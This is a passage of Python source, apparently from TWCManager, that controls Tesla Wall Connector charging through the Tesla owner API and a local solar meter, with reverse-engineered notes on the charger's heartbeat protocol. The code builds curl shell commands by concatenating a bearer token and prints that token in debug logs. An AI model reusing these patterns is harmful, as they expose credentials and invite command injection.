# on the third retry every 55 seconds. I suspect
# that might be a case of the car briefly losing
# wireless connection rather than actually going
# into a deep sleep.
# 'offline' may happen almost immediately if you
# don't have the charger plugged in.
else:
# Handle 'error' state.
if(now - vehicle.firstWakeAttemptTime <= 60*60):
# We've tried to wake the car for less than an
# hour.
foundKnownError = False
if('error' in apiResponseDict):
error = apiResponseDict['error']
for knownError in carApiTransientErrors:
if(knownError == error[0:len(knownError)]):
foundKnownError = True
break
if(foundKnownError):
# I see these errors often enough that I think
# it's worth re-trying in 1 minute rather than
# waiting 5 minutes for retry in the standard
# error handler.
vehicle.delayNextWakeAttempt = 60;
else:
# We're in an unexpected state. This could be caused
# by the API servers being down, car being out of
# range, or by something I can't anticipate. Try
# waking the car every 5 mins.
vehicle.delayNextWakeAttempt = 5*60;
else:
# Car hasn't woken for over an hour. Try again
# in 15 minutes. We'll show an error about this
# later.
vehicle.delayNextWakeAttempt = 15*60;
if(debugLevel >= 1):
if(state == 'error'):
print(time_now() + ": Car API wake car failed with unknown response. " \
"Will try again in "
+ str(vehicle.delayNextWakeAttempt) + " seconds.")
else:
print(time_now() + ": Car API wake car failed. State remains: '"
+ state + "'. Will try again in "
+ str(vehicle.delayNextWakeAttempt) + " seconds.")
if(vehicle.firstWakeAttemptTime > 0
and now - vehicle.firstWakeAttemptTime > 60*60):
# It should never take over an hour to wake a car. If it
# does, ask user to report an error.
print(time_now() + ": ERROR: We have failed to wake a car from '"
+ state + "' state for %.1f hours.\n" \
"Please private message user CDragon at " \
"http://teslamotorsclub.com with a copy of this error. " \
"Also include this: %s" % (
((now - vehicle.firstWakeAttemptTime) / 60 / 60),
str(apiResponseDict)))
if(now - carApiLastErrorTime < carApiErrorRetryMins*60 or carApiBearerToken == ''):
if(debugLevel >= 8):
print(time_now() + ": car_api_available returning False because of recent carApiLasterrorTime "
+ str(now - carApiLastErrorTime) + " or empty carApiBearerToken '"
+ carApiBearerToken + "'")
return False
if(debugLevel >= 8):
# We return True to indicate there was no error that prevents running
# car API commands and that we successfully got a list of vehicles.
# True does not indicate that any vehicle is actually awake and ready
# for commands.
print(time_now() + ": car_api_available returning True")
if(needSleep):
# If you send charge_start/stop less than 1 second after calling
# update_location(), the charge command usually returns:
# {'response': {'result': False, 'reason': 'could_not_wake_buses'}}
# I'm not sure if the same problem exists when sending commands too
# quickly after we send wake_up. I haven't seen a problem sending a
# command immediately, but it seems safest to sleep 5 seconds after
# waking before sending a command.
time.sleep(5);
return True
def car_api_charge(charge):
# Do not call this function directly. Call by using background thread:
# queue_background_task({'cmd':'charge', 'charge':<True/False>})
global debugLevel, carApiLastErrorTime, carApiErrorRetryMins, \
carApiTransientErrors, carApiVehicles, carApiLastStartOrStopChargeTime, \
homeLat, homeLon, onlyChargeMultiCarsAtHome
now = time.time()
apiResponseDict = {}
if(not charge):
# Whenever we are going to tell vehicles to stop charging, set
# vehicle.stopAskingToStartCharging = False on all vehicles.
for vehicle in carApiVehicles:
vehicle.stopAskingToStartCharging = False
if(now - carApiLastStartOrStopChargeTime < 60):
# Don't start or stop more often than once a minute
if(debugLevel >= 8):
print(time_now() + ': car_api_charge return because under 60 sec since last carApiLastStartOrStopChargeTime')
return 'error'
if(car_api_available(charge = charge) == False):
if(debugLevel >= 8):
print(time_now() + ': car_api_charge return because car_api_available() == False')
return 'error'
startOrStop = 'start' if charge else 'stop'
result = 'success'
for vehicle in carApiVehicles:
if(charge and vehicle.stopAskingToStartCharging):
if(debugLevel >= 8):
print(time_now() + ": Don't charge vehicle " + str(vehicle.ID)
+ " because vehicle.stopAskingToStartCharging == True")
continue
if(vehicle.ready() == False):
continue
# Only update carApiLastStartOrStopChargeTime if car_api_available() managed
# to wake cars. Setting this prevents any command below from being sent
# more than once per minute.
carApiLastStartOrStopChargeTime = now
if(onlyChargeMultiCarsAtHome and len(carApiVehicles) > 1):
# When multiple cars are enrolled in the car API, only start/stop
# charging cars parked at home.
if(vehicle.update_location() == False):
result = 'error'
continue
if(homeLat == 10000):
if(debugLevel >= 1):
print(time_now() + ": Home location for vehicles has never been set. " +
"We'll assume home is where we found the first vehicle currently parked. " +
"Home set to lat=" + str(vehicle.lat) + ", lon=" +
str(vehicle.lon))
homeLat = vehicle.lat
homeLon = vehicle.lon
save_settings()
# 1 lat or lon = ~364488.888 feet. The exact feet is different depending
# on the value of latitude, but this value should be close enough for
# our rough needs.
# 1/364488.888 * 10560 = 0.0289.
# So if vehicle is within 0289 lat and lon of homeLat/Lon,
# it's within ~10560 feet (2 miles) of home and we'll consider it to be
# at home.
# I originally tried using 0.00548 (~2000 feet) but one night the car
# consistently reported being 2839 feet away from home despite being
# parked in the exact spot I always park it. This is very odd because
# GPS is supposed to be accurate to within 12 feet. Tesla phone app
# also reports the car is not at its usual address. I suspect this
# is another case of a bug that's been causing car GPS to freeze the
# last couple months.
if(abs(homeLat - vehicle.lat) > 0.0289
or abs(homeLon - vehicle.lon) > 0.0289):
# Vehicle is not at home, so don't change its charge state.
if(debugLevel >= 1):
print(time_now() + ': Vehicle ID ' + str(vehicle.ID) +
' is not at home. Do not ' + startOrStop + ' charge.')
continue
# If you send charge_start/stop less than 1 second after calling
# update_location(), the charge command usually returns:
# {'response': {'result': False, 'reason': 'could_not_wake_buses'}}
# Waiting 2 seconds seems to consistently avoid the error, but let's
# wait 5 seconds in case of hardware differences between cars.
time.sleep(5)
cmd = 'curl -s -m 60 -X POST -H "accept: application/json" -H "Authorization:Bearer ' + \
carApiBearerToken + \
'" "https://owner-api.teslamotors.com/api/1/vehicles/' + \
str(vehicle.ID) + '/command/charge_' + startOrStop + '"'
# Retry up to 3 times on certain errors.
for retryCount in range(0, 3):
if(debugLevel >= 8):
print(time_now() + ': Car API cmd', cmd)
try:
apiResponseDict = json.loads(run_process(cmd).decode('ascii'))
except json.decoder.JSONDecodeError:
pass
try:
if(debugLevel >= 4):
print(time_now() + ': Car API ' + startOrStop + \
' charge response', apiResponseDict, '\n')
# Responses I've seen in apiResponseDict:
# Car is done charging:
# {'response': {'result': False, 'reason': 'complete'}}
# Car wants to charge but may not actually be charging. Oddly, this
# is the state reported when car is not plugged in to a charger!
# It's also reported when plugged in but charger is not offering
# power or even when the car is in an error state and refuses to
# charge.
# {'response': {'result': False, 'reason': 'charging'}}
# Car not reachable:
# {'response': None, 'error_description': '', 'error': 'vehicle unavailable: {:error=>"vehicle unavailable:"}'}
# This weird error seems to happen randomly and re-trying a few
# seconds later often succeeds:
# {'response': {'result': False, 'reason': 'could_not_wake_buses'}}
# I've seen this a few times on wake_up, charge_start, and drive_state:
# {'error': 'upstream internal error', 'response': None, 'error_description': ''}
# I've seen this once on wake_up:
# {'error': 'operation_timedout for txid `4853e3ad74de12733f8cc957c9f60040`}', 'response': None, 'error_description': ''}
# Start or stop charging success:
# {'response': {'result': True, 'reason': ''}}
if(apiResponseDict['response'] == None):
if('error' in apiResponseDict):
foundKnownError = False
error = apiResponseDict['error']
for knownError in carApiTransientErrors:
if(knownError == error[0:len(knownError)]):
# I see these errors often enough that I think
# it's worth re-trying in 1 minute rather than
# waiting carApiErrorRetryMins minutes for retry
# in the standard error handler.
if(debugLevel >= 1):
print(time_now() + ": Car API returned '"
+ error
+ "' when trying to start charging. Try again in 1 minute.")
time.sleep(60)
foundKnownError = True
break
if(foundKnownError):
continue
# This generally indicates a significant error like 'vehicle
# unavailable', but it's not something I think the caller can do
# anything about, so return generic 'error'.
result = 'error'
# Don't send another command to this vehicle for
# carApiErrorRetryMins mins.
vehicle.lastErrorTime = now
elif(apiResponseDict['response']['result'] == False):
if(charge):
reason = apiResponseDict['response']['reason']
if(reason == 'complete' or reason == 'charging'):
# We asked the car to charge, but it responded that
# it can't, either because it's reached target
# charge state (reason == 'complete'), or it's
# already trying to charge (reason == 'charging').
# In these cases, it won't help to keep asking it to
# charge, so set vehicle.stopAskingToStartCharging =
# True.
#
# Remember, this only means at least one car in the
# list wants us to stop asking and we don't know
# which car in the list is connected to our TWC.
if(debugLevel >= 1):
print(time_now() + ': Vehicle ' + str(vehicle.ID)
+ ' is done charging or already trying to charge. Stop asking to start charging.')
vehicle.stopAskingToStartCharging = True
else:
# Car was unable to charge for some other reason, such
# as 'could_not_wake_buses'.
if(reason == 'could_not_wake_buses'):
# This error often happens if you call
# charge_start too quickly after another command
# like drive_state. Even if you delay 5 seconds
# between the commands, this error still comes
# up occasionally. Retrying often succeeds, so
# wait 5 secs and retry.
# If all retries fail, we'll try again in a
# minute because we set
# carApiLastStartOrStopChargeTime = now earlier.
time.sleep(5)
continue
else:
# Start or stop charge failed with an error I
# haven't seen before, so wait
# carApiErrorRetryMins mins before trying again.
print(time_now() + ': ERROR "' + reason + '" when trying to ' +
startOrStop + ' car charging via Tesla car API. Will try again later.' +
"\nIf this error persists, please private message user CDragon at http://teslamotorsclub.com " \
"with a copy of this error.")
result = 'error'
vehicle.lastErrorTime = now
except (KeyError, TypeError):
# This catches cases like trying to access
# apiResponseDict['response'] when 'response' doesn't exist in
# apiResponseDict.
print(time_now() + ': ERROR: Failed to ' + startOrStop
+ ' car charging via Tesla car API. Will try again later.')
vehicle.lastErrorTime = now
break
if(debugLevel >= 1 and carApiLastStartOrStopChargeTime == now):
print(time_now() + ': Car API ' + startOrStop + ' charge result: ' + result)
return result
def queue_background_task(task):
global backgroundTasksQueue, backgroundTasksCmds
if(task['cmd'] in backgroundTasksCmds):
# Some tasks, like cmd='charge', will be called once per second until
# a charge starts or we determine the car is done charging. To avoid
# wasting memory queing up a bunch of these tasks when we're handling
# a charge cmd already, don't queue two of the same task.
return
# Insert task['cmd'] in backgroundTasksCmds to prevent queuing another
# task['cmd'] till we've finished handling this one.
backgroundTasksCmds[task['cmd']] = True
# Queue the task to be handled by background_tasks_thread.
backgroundTasksQueue.put(task)
def background_tasks_thread():
global backgroundTasksQueue, backgroundTasksCmds, carApiLastErrorTime
while True:
task = backgroundTasksQueue.get()
if(task['cmd'] == 'charge'):
# car_api_charge does nothing if it's been under 60 secs since it
# was last used so we shouldn't have to worry about calling this
# too frequently.
car_api_charge(task['charge'])
elif(task['cmd'] == 'carApiEmailPassword'):
carApiLastErrorTime = 0
car_api_available(task['email'], task['password'])
elif(task['cmd'] == 'checkGreenEnergy'):
check_green_energy()
# Delete task['cmd'] from backgroundTasksCmds such that
# queue_background_task() can queue another task['cmd'] in the future.
del backgroundTasksCmds[task['cmd']]
# task_done() must be called to let the queue know the task is finished.
# backgroundTasksQueue.join() can then be used to block until all tasks
# in the queue are done.
backgroundTasksQueue.task_done()
def check_green_energy():
global debugLevel, maxAmpsToDivideAmongSlaves, greenEnergyAmpsOffset, \
minAmpsPerTWC, backgroundTasksLock
# I check solar panel generation using an API exposed by The
# Energy Detective (TED). It's a piece of hardware available
# at http://www. theenergydetective.com
# You may also be able to find a way to query a solar system
# on the roof using an API provided by your solar installer.
# Most of those systems only update the amount of power the
# system is producing every 15 minutes at most, but that's
# fine for tweaking your car charging.
#
# In the worst case, you could skip finding realtime green
# energy data and simply direct the car to charge at certain
# rates at certain times of day that typically have certain
# levels of solar or wind generation. To do so, use the hour
# and min variables as demonstrated just above this line:
# backgroundTasksQueue.put({'cmd':'checkGreenEnergy')
#
# The curl command used below can be used to communicate
# with almost any web API, even ones that require POST
# values or authentication. The -s option prevents curl from
# displaying download stats. -m 60 prevents the whole
# operation from taking over 60 seconds.
greenEnergyData = run_process('curl -s -m 60 "http://192.168.13.58/history/export.csv?T=1&D=0&M=1&C=1"')
# In case, greenEnergyData will contain something like this:
# MTU, Time, Power, Cost, Voltage
# Solar,11/11/2017 14:20:43,-2.957,-0.29,124.3
# The only part we care about is -2.957 which is negative
# kW currently being generated. When 0kW is generated, the
# negative disappears so we make it optional in the regex
# below.
m = re.search(b'^Solar,[^,]+,-?([^, ]+),', greenEnergyData, re.MULTILINE)
if(m):
solarW = int(float(m.group(1)) * 1000)
# Use backgroundTasksLock to prevent changing maxAmpsToDivideAmongSlaves
# if the main thread is in the middle of examining and later using
# that value.
backgroundTasksLock.acquire()
# Watts = Volts * Amps
# Car charges at 240 volts in North America so we figure
# out how many amps * 240 = solarW and limit the car to
# that many amps.
maxAmpsToDivideAmongSlaves = (solarW / 240) + \
greenEnergyAmpsOffset
if(debugLevel >= 1):
print("%s: Solar generating %dW so limit car charging to:\n" \
" %.2fA + %.2fA = %.2fA. Charge when above %.0fA (minAmpsPerTWC)." % \
(time_now(), solarW, (solarW / 240),
greenEnergyAmpsOffset, maxAmpsToDivideAmongSlaves,
minAmpsPerTWC))
backgroundTasksLock.release()
else:
print(time_now() +
" ERROR: Can't determine current solar generation from:\n" +
str(greenEnergyData))
#
# End functions
#
##############################
##############################
#
# Begin CarApiVehicle class
#
class CarApiVehicle:
ID = None
firstWakeAttemptTime = 0
lastWakeAttemptTime = 0
delayNextWakeAttempt = 0
lastErrorTime = 0
stopAskingToStartCharging = False
lat = 10000
lon = 10000
def __init__(self, ID):
self.ID = ID
def ready(self):
global carApiLastErrorTime, carApiErrorRetryMins
if(time.time() - self.lastErrorTime < carApiErrorRetryMins*60):
# It's been under carApiErrorRetryMins minutes since the car API
# generated an error on this vehicle. Return that car is not ready.
if(debugLevel >= 8):
print(time_now() + ': Vehicle ' + str(self.ID)
+ ' not ready because of recent lastErrorTime '
+ str(self.lastErrorTime))
return False
if(self.firstWakeAttemptTime == 0 and time.time() - self.lastWakeAttemptTime < 2*60):
# Less than 2 minutes since we successfully woke this car, so it
# should still be awake. Tests on my car in energy saver mode show
# it returns to sleep state about two minutes after the last command
# was issued. Times I've tested: 1:35, 1:57, 2:30
return True
if(debugLevel >= 8):
print(time_now() + ': Vehicle ' + str(self.ID)
+ " not ready because it wasn't woken in the last 2 minutes.")
return False
def update_location(self):
global carApiLastErrorTime, carApiTransientErrors
if(self.ready() == False):
return False
apiResponseDict = {}
cmd = 'curl -s -m 60 -H "accept: application/json" -H "Authorization:Bearer ' + \
carApiBearerToken + \
'" "https://owner-api.teslamotors.com/api/1/vehicles/' + \
str(self.ID) + '/data_request/drive_state"'
# Retry up to 3 times on certain errors.
for retryCount in range(0, 3):
if(debugLevel >= 8):
print(time_now() + ': Car API cmd', cmd)
try:
apiResponseDict = json.loads(run_process(cmd).decode('ascii'))
# This error can happen here as well:
# {'response': {'reason': 'could_not_wake_buses', 'result': False}}
# This one is somewhat common:
# {'response': None, 'error': 'vehicle unavailable: {:error=>"vehicle unavailable:"}', 'error_description': ''}
except json.decoder.JSONDecodeError:
pass
try:
if(debugLevel >= 4):
print(time_now() + ': Car API vehicle GPS location', apiResponseDict, '\n')
if('error' in apiResponseDict):
foundKnownError = False
error = apiResponseDict['error']
for knownError in carApiTransientErrors:
if(knownError == error[0:len(knownError)]):
# I see these errors often enough that I think
# it's worth re-trying in 1 minute rather than
# waiting carApiErrorRetryMins minutes for retry
# in the standard error handler.
if(debugLevel >= 1):
print(time_now() + ": Car API returned '"
+ error
+ "' when trying to get GPS location. Try again in 1 minute.")
time.sleep(60)
foundKnownError = True
break
if(foundKnownError):
continue
response = apiResponseDict['response']
# A successful call to drive_state will not contain a
# response['reason'], so we check if the 'reason' key exists.
if('reason' in response and response['reason'] == 'could_not_wake_buses'):
# Retry after 5 seconds. See notes in car_api_charge where
# 'could_not_wake_buses' is handled.
time.sleep(5)
continue
self.lat = response['latitude']
self.lon = response['longitude']
except (KeyError, TypeError):
# This catches cases like trying to access
# apiResponseDict['response'] when 'response' doesn't exist in
# apiResponseDict.
if(debugLevel >= 1):
print(time_now() + ": ERROR: Can't get GPS location of vehicle " + str(self.ID) + \
". Will try again later.")
self.lastErrorTime = time.time()
return False
return True
#
# End CarApiVehicle class
#
##############################
##############################
#
# Begin TWCSlave class
#
class TWCSlave:
TWCID = None
maxAmps = None
# Protocol 2 TWCs tend to respond to commands sent using protocol 1, so
# default to that till we know for sure we're talking to protocol 2.
protocolVersion = 1
minAmpsTWCSupports = 6
masterHeartbeatData = bytearray(b'\x00\x00\x00\x00\x00\x00\x00\x00\x00')
timeLastRx = time.time()
# reported* vars below are reported to us in heartbeat messages from a Slave
# TWC.
reportedAmpsMax = 0
reportedAmpsActual = 0
reportedState = 0
# reportedAmpsActual frequently changes by small amounts, like 5.14A may
# frequently change to 5.23A and back.
# reportedAmpsActualSignificantChangeMonitor is set to reportedAmpsActual
# whenever reportedAmpsActual is at least 0.8A different than
# reportedAmpsActualSignificantChangeMonitor. Whenever
# reportedAmpsActualSignificantChangeMonitor is changed,
# timeReportedAmpsActualChangedSignificantly is set to the time of the
# change. The value of reportedAmpsActualSignificantChangeMonitor should not
# be used for any other purpose. timeReportedAmpsActualChangedSignificantly
# is used for things like preventing start and stop charge on a car more
# than once per minute.
reportedAmpsActualSignificantChangeMonitor = -1
timeReportedAmpsActualChangedSignificantly = time.time()
lastAmpsOffered = -1
timeLastAmpsOfferedChanged = time.time()
lastHeartbeatDebugOutput = ''
timeLastHeartbeatDebugOutput = 0
wiringMaxAmps = wiringMaxAmpsPerTWC
def __init__(self, TWCID, maxAmps):
self.TWCID = TWCID
self.maxAmps = maxAmps
def print_status(self, heartbeatData):
global fakeMaster, masterTWCID
try:
debugOutput = ": SHB %02X%02X: %02X %05.2f/%05.2fA %02X%02X" % \
(self.TWCID[0], self.TWCID[1], heartbeatData[0],
(((heartbeatData[3] << 8) + heartbeatData[4]) / 100),
(((heartbeatData[1] << 8) + heartbeatData[2]) / 100),
heartbeatData[5], heartbeatData[6]
)
if(self.protocolVersion == 2):
debugOutput += (" %02X%02X" % (heartbeatData[7], heartbeatData[8]))
debugOutput += " M"
if(not fakeMaster):
debugOutput += " %02X%02X" % (masterTWCID[0], masterTWCID[1])
debugOutput += ": %02X %05.2f/%05.2fA %02X%02X" % \
(self.masterHeartbeatData[0],
(((self.masterHeartbeatData[3] << 8) + self.masterHeartbeatData[4]) / 100),
(((self.masterHeartbeatData[1] << 8) + self.masterHeartbeatData[2]) / 100),
self.masterHeartbeatData[5], self.masterHeartbeatData[6])
if(self.protocolVersion == 2):
debugOutput += (" %02X%02X" %
(self.masterHeartbeatData[7], self.masterHeartbeatData[8]))
# Only output once-per-second heartbeat debug info when it's
# different from the last output or if the only change has been amps
# in use and it's only changed by 1.0 or less. Also output f it's
# been 10 mins since the last output or if debugLevel is turned up
# to 11.
lastAmpsUsed = 0
ampsUsed = 1
debugOutputCompare = debugOutput
m1 = re.search(r'SHB ....: .. (..\...)/', self.lastHeartbeatDebugOutput)
if(m1):
lastAmpsUsed = float(m1.group(1))
m2 = re.search(r'SHB ....: .. (..\...)/', debugOutput)
if(m2):
ampsUsed = float(m2.group(1))
if(m1):
debugOutputCompare = debugOutputCompare[0:m2.start(1)] + \
self.lastHeartbeatDebugOutput[m1.start(1):m1.end(1)] + \
debugOutputCompare[m2.end(1):]
if(
debugOutputCompare != self.lastHeartbeatDebugOutput
or abs(ampsUsed - lastAmpsUsed) >= 1.0
or time.time() - self.timeLastHeartbeatDebugOutput > 600
or debugLevel >= 11
):
print(time_now() + debugOutput)
self.lastHeartbeatDebugOutput = debugOutput
self.timeLastHeartbeatDebugOutput = time.time()
except IndexError:
# This happens if we try to access, say, heartbeatData[8] when
# len(heartbeatData) < 9. This was happening due to a bug I fixed
# but I may as well leave this here just in case.
if(len(heartbeatData) != (7 if self.protocolVersion == 1 else 9)):
print(time_now() + ': Error in print_status displaying heartbeatData',
heartbeatData, 'based on msg', hex_str(msg))
if(len(self.masterHeartbeatData) != (7 if self.protocolVersion == 1 else 9)):
print(time_now() + ': Error in print_status displaying masterHeartbeatData', self.masterHeartbeatData)
def send_slave_heartbeat(self, masterID):
# Send slave heartbeat
#
# Heartbeat includes data we store in slaveHeartbeatData.
# Meaning of data:
#
# Byte 1 is a state code:
# 00 Ready
# Car may or may not be plugged in.
# When car has reached its charge target, I've repeatedly seen it
# change from 03 to 00 the moment I wake the car using the phone app.
# 01 Plugged in, charging
# 02 Error
# This indicates an error such as not getting a heartbeat message
# from Master for too long.
# 03 Plugged in, do not charge
# I've seen this state briefly when plug is first inserted, and
# I've seen this state remain indefinitely after pressing stop
# charge on car's screen or when the car reaches its target charge
# percentage. Unfortunately, this state does not reliably remain
# set, so I don't think it can be used to tell when a car is done
# charging. It may also remain indefinitely if TWCManager script is
# stopped for too long while car is charging even after TWCManager
# is restarted. In that case, car will not charge even when start
# charge on screen is pressed - only re-plugging in charge cable
# fixes it.
# 04 Plugged in, ready to charge or charge scheduled
# I've seen this state even when car is set to charge at a future
# time via its UI. In that case, it won't accept power offered to
# it.
# 05 Busy?
# I've only seen it hit this state for 1 second at a time and it
# can seemingly happen during any other state. Maybe it means wait,
# I'm busy? Communicating with car?
# 08 Starting to charge?
# This state may remain for a few seconds while car ramps up from
# 0A to 1.3A, then state usually changes to 01. Sometimes car skips
# 08 and goes directly to 01.
# I saw 08 consistently each time I stopped fake master script with
# car scheduled to charge, plugged in, charge port blue. If the car
# is actually charging and you stop TWCManager, after 20-30 seconds
# the charge port turns solid red, steering wheel display says
# "charge cable fault", and main screen says "check charger power".
# When TWCManager is started, it sees this 08 status again. If we
# start TWCManager and send the slave a new max power value, 08
# becomes 00 and car starts charging again.
#
# Protocol 2 adds a number of other states:
# 06, 07, 09
# These are each sent as a response to Master sending the
# corresponding state. Ie if Master sends 06, slave responds with
# 06. See notes in send_master_heartbeat for meaning.
# 0A Amp adjustment period complete
# Master uses state 06 and 07 to raise or lower the slave by 2A
# temporarily. When that temporary period is over, it changes
# state to 0A.
# 0F was reported by another user but I've not seen it during testing
# and have no idea what it means.
#
# Byte 2-3 is the max current available as provided by bytes 2-3 in our
# fake master status.
# For example, if bytes 2-3 are 0F A0, combine them as 0x0fa0 hex which
# is 4000 in base 10. Move the decimal point two places left and you get
# 40.00Amps max.
#
# Byte 4-5 represents the power the car is actually drawing for
# charging. When a car is told to charge at 19A you may see a value like
# 07 28 which is 0x728 hex or 1832 in base 10. Move the decimal point
# two places left and you see the charger is using 18.32A.
# Some TWCs report 0A when a car is not charging while others may report
# small values such as 0.25A. I suspect 0A is what should be reported
# and any small value indicates a minor calibration error.
#
# Remaining bytes are always 00 00 from what I've seen and could be
# reserved for future use or may be used in a situation I've not
# observed. Protocol 1 uses two zero bytes while protocol 2 uses four.
###############################
# How was the above determined?
#
# An unplugged slave sends a status like this:
# 00 00 00 00 19 00 00
#
# A real master always sends all 00 status data to a slave reporting the
# above status. slaveHeartbeatData[0] is the main driver of how master
# responds, but whether slaveHeartbeatData[1] and [2] have 00 or non-00
# values also matters.
#
# I did a test with a protocol 1 TWC with fake slave sending
# slaveHeartbeatData[0] values from 00 to ff along with
# slaveHeartbeatData[1-2] of 00 and whatever
# value Master last responded with. I found:
# Slave sends: 04 00 00 00 19 00 00
# Master responds: 05 12 c0 00 00 00 00
#
# Slave sends: 04 12 c0 00 19 00 00
# Master responds: 00 00 00 00 00 00 00
#
# Slave sends: 08 00 00 00 19 00 00
# Master responds: 08 12 c0 00 00 00 00
#
# Slave sends: 08 12 c0 00 19 00 00
# Master responds: 00 00 00 00 00 00 00
#
# In other words, master always sends all 00 unless slave sends
# slaveHeartbeatData[0] 04 or 08 with slaveHeartbeatData[1-2] both 00.
#
# I interpret all this to mean that when slave sends
# slaveHeartbeatData[1-2] both 00, it's requesting a max power from
# master. Master responds by telling the slave how much power it can
# use. Once the slave is saying how much max power it's going to use
# (slaveHeartbeatData[1-2] = 12 c0 = 32.00A), master indicates that's
# fine by sending 00 00.
#
# However, if the master wants to set a lower limit on the slave, all it
# has to do is send any heartbeatData[1-2] value greater than 00 00 at
# any time and slave will respond by setting its
# slaveHeartbeatData[1-2] to the same value.
#
# I thought slave might be able to negotiate a lower value if, say, the
# car reported 40A was its max capability or if the slave itself could
# only handle 80A, but the slave dutifully responds with the same value
# master sends it even if that value is an insane 655.35A. I tested
# these values on car which has a 40A limit when AC charging and
# slave accepts them all:
# 0f aa (40.10A)
# 1f 40 (80.00A)
# 1f 41 (80.01A)
# ff ff (655.35A)
global fakeTWCID, slaveHeartbeatData, overrideMasterHeartbeatData
if(self.protocolVersion == 1 and len(slaveHeartbeatData) > 7):
# Cut array down to length 7
slaveHeartbeatData = slaveHeartbeatData[0:7]
elif(self.protocolVersion == 2):
while(len(slaveHeartbeatData) < 9):
# Increase array length to 9
slaveHeartbeatData.append(0x00)
send_msg(bytearray(b'\xFD\xE0') + fakeTWCID + bytearray(masterID) + bytearray(slaveHeartbeatData))
def send_master_heartbeat(self):
# Send our fake master's heartbeat to this TWCSlave.
#
# Heartbeat includes 7 bytes (Protocol 1) or 9 bytes (Protocol 2) of data
# that we store in masterHeartbeatData.
# Meaning of data:
#
# Byte 1 is a command:
# 00 Make no changes
# 02 Error
# Byte 2 appears to act as a bitmap where each set bit causes the
# slave TWC to enter a different error state. First 8 digits below
# show which bits are set and these values were tested on a Protocol
# 2 TWC:
# 0000 0001 = Middle LED blinks 3 times red, top LED solid green.
# Manual says this code means 'Incorrect rotary switch
# setting.'
# 0000 0010 = Middle LED blinks 5 times red, top LED solid green.
# Manual says this code means 'More than three Wall
# Connectors are set to Slave.'
# 0000 0100 = Middle LED blinks 6 times red, top LED solid green.
# Manual says this code means 'The networked Wall
# Connectors have different maximum current
# capabilities.'
# 0000 1000 = No effect
# 0001 0000 = No effect
# 0010 0000 = No effect
# 0100 0000 = No effect
# 1000 0000 = No effect
# When two bits are set, the lowest bit (rightmost bit) seems to
# take precedence (ie 111 results in 3 blinks, 110 results in 5
# blinks).
#
# If you send 02 to a slave TWC with an error code that triggers
# the middle LED to blink red, slave responds with 02 in its
# heartbeat, then stops sending heartbeat and refuses further
# communication. Slave's error state can be cleared by holding red
# reset button on its left side for about 4 seconds.
# If you send an error code with bitmap 11110xxx (where x is any bit),
# the error can not be cleared with a 4-second reset. Instead, you
# must power cycle the TWC or 'reboot' reset which means holding
# reset for about 6 seconds till all the LEDs turn green.
# 05 Tell slave charger to limit power to number of amps in bytes 2-3.
#
# Protocol 2 adds a few more command codes:
# 06 Increase charge current by 2 amps. Slave changes its heartbeat
# state to 06 in response. After 44 seconds, slave state changes to
# 0A but amp value doesn't change. This state seems to be used to
# safely creep up the amp value of a slave when the Master has extra
# power to distribute. If a slave is attached to a car that doesn't
# want that many amps, Master will see the car isn't accepting the
# amps and stop offering more. It's possible the 0A state change
# is not time based but rather indicates something like the car is
# now using as many amps as it's going to use.
# 07 Lower charge current by 2 amps. Slave changes its heartbeat state
# to 07 in response. After 10 seconds, slave raises its amp setting
# back up by 2A and changes state to 0A.
# I could be wrong, but when a real car doesn't want the higher amp
# value, I think the TWC doesn't raise by 2A after 10 seconds. Real
# Master TWCs seem to send 07 state to all children periodically as
# if to check if they're willing to accept lower amp values. If
# they do, Master assigns those amps to a different slave using the
# 06 state.
# 08 Master acknowledges that slave stopped charging (I think), but
# the next two bytes contain an amp value the slave could be using.
# 09 Tell slave charger to limit power to number of amps in bytes 2-3.
# This command replaces the 05 command in Protocol 1. However, 05
# continues to be used, but only to set an amp value to be used
# before a car starts charging. If 05 is sent after a car is
# already charging, it is ignored.
#
# Byte 2-3 is the max current a slave TWC can charge at in command codes
# 05, 08, and 09. In command code 02, byte 2 is a bitmap. With other
# command codes, bytes 2-3 are ignored.
# If bytes 2-3 are an amp value of 0F A0, combine them as 0x0fa0 hex
# which is 4000 in base 10. Move the decimal point two places left and
# you get 40.00Amps max.
#
# Byte 4: 01 when a Master TWC is physically plugged in to a car.
# Otherwise 00.
#
# Remaining bytes are always 00.
#
# Example 7-byte data that real masters have sent in Protocol 1:
# 00 00 00 00 00 00 00 (Idle)
# 02 04 00 00 00 00 00 (Error bitmap 04. This happened when I
# advertised a fake Master using an invalid max
# amp value)
# 05 0f a0 00 00 00 00 (Master telling slave to limit power to 0f a0
# (40.00A))
# 05 07 d0 01 00 00 00 (Master plugged in to a car and presumably
# telling slaves to limit power to 07 d0
# (20.00A). 01 byte indicates Master is plugged
# in to a car.)
global fakeTWCID, overrideMasterHeartbeatData, debugLevel, \
timeLastTx, carApiVehicles
if(len(overrideMasterHeartbeatData) >= 7):
self.masterHeartbeatData = overrideMasterHeartbeatData
if(self.protocolVersion == 2):
# TODO: Start and stop charging using protocol 2 commands to TWC
# instead of car api if I ever figure out how.
if(self.lastAmpsOffered == 0 and self.reportedAmpsActual > 4.0):
# Car is trying to charge, so stop it via car API.
# car_api_charge() will prevent telling the car to start or stop
# more than once per minute. Once the car gets the message to
# stop, reportedAmpsActualSignificantChangeMonitor should drop
# to near zero within a few seconds.
# WARNING: If you own two vehicles and one is charging at home but
# the other is charging away from home, this command will stop
# them both from charging. If the away vehicle is not currently
# charging, I'm not sure if this would prevent it from charging
# when next plugged in.
queue_background_task({'cmd':'charge', 'charge':False})
elif(self.lastAmpsOffered >= 5.0 and self.reportedAmpsActual < 2.0
and self.reportedState != 0x02
):
# Car is not charging and is not reporting an error state, so
# try starting charge via car api.
queue_background_task({'cmd':'charge', 'charge':True})
elif(self.reportedAmpsActual > 4.0):
# At least one plugged in car is successfully charging. We don't
# know which car it is, so we must set
# vehicle.stopAskingToStartCharging = False on all vehicles such
# that if any vehicle is not charging without us calling
# car_api_charge(False), we'll try to start it charging again at
# least once. This probably isn't necessary but might prevent
# some unexpected case from never starting a charge. It also
# seems less confusing to see in the output that we always try
# to start API charging after the car stops taking a charge.
for vehicle in carApiVehicles:
vehicle.stopAskingToStartCharging = False
send_msg(bytearray(b'\xFB\xE0') + fakeTWCID + bytearray(self.TWCID)
+ bytearray(self.masterHeartbeatData))
def receive_slave_heartbeat(self, heartbeatData):
# Handle heartbeat message received from real slave TWC.
global debugLevel, nonScheduledAmpsMax, \
maxAmpsToDivideAmongSlaves, wiringMaxAmpsAllTWCs, \
